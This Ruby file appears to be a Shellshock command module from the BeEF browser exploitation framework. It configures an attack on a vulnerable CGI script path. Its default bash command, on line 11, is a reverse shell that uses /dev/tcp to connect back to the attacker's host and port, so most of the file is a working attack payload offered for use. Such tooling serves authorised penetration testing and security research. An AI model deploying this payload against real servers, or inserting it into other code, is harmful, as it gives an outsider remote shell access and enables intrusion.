1
#
2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
# Browser Exploitation Framework (BeEF) - https://beefproject.com
4
# See the file 'doc/COPYING' for copying permission
5
#
6
class Shell_shocked < BeEF::Core::Command
7
  def self.options
8
    configuration = BeEF::Core::Configuration.instance
9
    lhost = configuration.beef_host
10
    lhost = 'LHOST' if lhost == '0.0.0.0'
11
    payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"
12

13
    [
14
      { 'name' => 'Target', 'description' => 'Vulnerable cgi script path', 'ui_label' => 'Target', 'value' => 'http://127.0.0.1/cgi-bin/test.cgi' },
15
      { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
16
      { 'name' => 'Bash_Command', 'description' => 'the command to execute', 'ui_label' => 'Bash Command', 'value' => payload }
17
    ]
18
  end
19

20
  def post_execute
21
    save({ 'result' => @datastore['result'] })
22
  end
23
end
24

25